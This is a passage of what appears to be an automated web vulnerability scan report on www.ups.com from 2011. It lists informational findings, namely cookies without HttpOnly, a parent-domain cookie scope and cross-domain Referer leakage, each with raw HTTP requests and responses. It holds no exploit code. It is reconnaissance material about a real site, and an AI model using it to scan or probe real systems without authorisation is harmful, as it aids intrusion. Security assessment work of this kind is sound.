<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

4.5. http://www.ups.com/bussol  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bussol HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:25 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=CpLmNYGFLpNtpqTnvyFvXqLSv5TX0FZ3vFpMzNvC2T9yyBWp2R6w!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17812


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

4.6. http://www.ups.com/bussol/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bussol/ HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=L4Q2NYGKGGg41rY4v2p15X5VtBj5TZvQQ9RxQ2rRTJQ2WXTmgdTB!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17812


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

4.7. http://www.ups.com/search/quick  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /search/quick

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search/quick HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:32 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: UPSsrch=k3qfNYGM781yrFnnG0nJqhpBnWbGJg60JW1hQpxynsXfNJJSJhVJ!2141831698!-1727860139!20402!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31677


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

5. Cookie scoped to parent domain  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

Request

GET /?Site=Corporate&cookie=us_en_home&inputImgTag=&setCookie=yes HTTP/1.1
Host: www.ups.com
Proxy-Connection: keep-alive
Referer: http://www.ups.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:15:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: defaultHome=us_en_home|1297646131685; domain=.ups.com; expires=Tuesday, 14-Feb-2012 01:15:31 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 124123


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

6. Cross-domain Referer leakage  previous  next
There are 45 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


6.1. http://www.ups.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?Site=Corporate&cookie=us_en_home&inputImgTag=&setCookie=yes HTTP/1.1
Host: www.ups.com
Proxy-Connection: keep-alive
Referer: http://www.ups.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:15:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: defaultHome=us_en_home|1297646131685; domain=.ups.com; expires=Tuesday, 14-Feb-2012 01:15:31 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 124123


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.2. http://www.ups.com/WebTracking/track  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /WebTracking/track

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /WebTracking/track?loc=en_US&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:25 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64973


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.3. http://www.ups.com/bussol  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /bussol?loc=en_US&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=lbrFNYGGxNjLRJDYD8XJvDQG6t7p2CkK1LSmVpm85CbZbf3LhHh8!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17836


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<div class="arrow-blue"><a href="http://get.adobe.com/flashplayer/">Get Adobe&reg; Flash&reg; Player</a>
...[SNIP]...
<dt><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Feedback" alt="[+] Feedback" src="/img/icn_plus_black.gif" width="9" height="9">
...[SNIP]...

6.4. http://www.ups.com/bussol/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /bussol/?loc=en_US&viewID=browseView&WT.svl=PriNav&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=Ym1tNYGKhbBZdq5fshhQNNqnhjW33TXphQCtzMxvLh05VhPpZj66!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17882


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<div class="arrow-blue"><a href="http://get.adobe.com/flashplayer/">Get Adobe&reg; Flash&reg; Player</a>
...[SNIP]...
<dt><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Feedback" alt="[+] Feedback" src="/img/icn_plus_black.gif" width="9" height="9">
...[SNIP]...

6.5. http://www.ups.com/content/global/index.jsx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/global/index.jsx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /content/global/index.jsx?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:23 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21763


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Global Home">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME
...[SNIP]...
<noscript>
&nbsp;<a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Feedback" alt="[+] Feedback" src="/img/icn_plus_black.gif" width="9" height="9">
...[SNIP]...

6.6. http://www.ups.com/content/us/en/about/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/about/index.html?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:19 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46411


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.7. http://www.ups.com/content/us/en/about/sites.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/sites.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/about/sites.html?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:19 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44920


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.8. http://www.ups.com/content/us/en/contact/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/contact/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/contact/index.html?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:16 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34876


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<div class="arrow-blue"><a href="http://www.upsjobs.com/">UPS Careers</a>
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.9. http://www.ups.com/content/us/en/freight/air_freight.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/air_freight.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/freight/air_freight.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:50 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39124


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.10. http://www.ups.com/content/us/en/freight/customsbrokerage.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/customsbrokerage.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/freight/customsbrokerage.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:57 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37686


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.11. http://www.ups.com/content/us/en/freight/expedite.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/expedite.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/freight/expedite.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:50 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37440


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.12. http://www.ups.com/content/us/en/freight/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/freight/index.html?WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:50 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41321


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.13. http://www.ups.com/content/us/en/freight/ocean_freight.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/ocean_freight.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/freight/ocean_freight.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:56 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38437


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.14. http://www.ups.com/content/us/en/freight/road_freight.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/road_freight.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/freight/road_freight.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:54 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37847


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.15. http://www.ups.com/content/us/en/index.jsx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/index.jsx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/index.jsx?WT.svl=BrndMrk HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 123916


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
